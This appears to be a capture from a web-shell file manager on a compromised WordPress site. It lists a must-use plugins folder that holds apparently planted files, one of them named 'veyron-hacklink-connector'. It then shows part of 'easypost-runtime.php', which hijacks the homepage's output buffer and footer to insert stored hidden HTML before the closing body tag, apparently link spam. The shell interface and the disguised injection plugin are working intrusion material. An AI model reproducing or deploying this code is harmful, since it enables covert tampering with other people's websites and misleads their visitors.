/home/cp072267/public_html/dkrgroupholdings.com/wp-content/mu-plugins
NameSizeModeActions
veyron-hacklink-connector/-0755rm
advanced-flow-control.php353920644editdlrm
automation-by-installatron.php9830644editdlrm
bbc-watchdog.php73920644editdlrm
easypost-runtime.php21950644editdlrm
error_log28120644editdlrm
jolt-publisher-hq.php1915280444editdlrm
veyron-hacklink-connector.php2920644editdlrm
Edit: /home/cp072267/public_html/dkrgroupholdings.com/wp-content/mu-plugins/easypost-runtime.php (2195B)
0 && $buffer !== '' && strpos($buffer, $marker) !== false) { continue; } $html[] = (string) $placement['html']; } return implode("\n", $html); } function easypost_runtime_echo() { if (!easypost_runtime_is_homepage()) { return; } $html = easypost_runtime_missing_html(''); if ($html !== '') { echo "\n" . $html . "\n"; } } function easypost_runtime_buffer_start() { if (!easypost_runtime_is_homepage() || empty(easypost_runtime_get_placements())) { return; } ob_start('easypost_runtime_inject_buffer'); } function easypost_runtime_inject_buffer($buffer) { $html = easypost_runtime_missing_html($buffer); if ($html === '') { return $buffer; } if (stripos($buffer, '') !== false) { return preg_replace('/<\/body>/i', "\n" . $html . "\n", $buffer, 1); } return $buffer . "\n" . $html; } add_action('template_redirect', 'easypost_runtime_buffer_start', 0); add_action('wp_footer', 'easypost_runtime_echo', PHP_INT_MAX);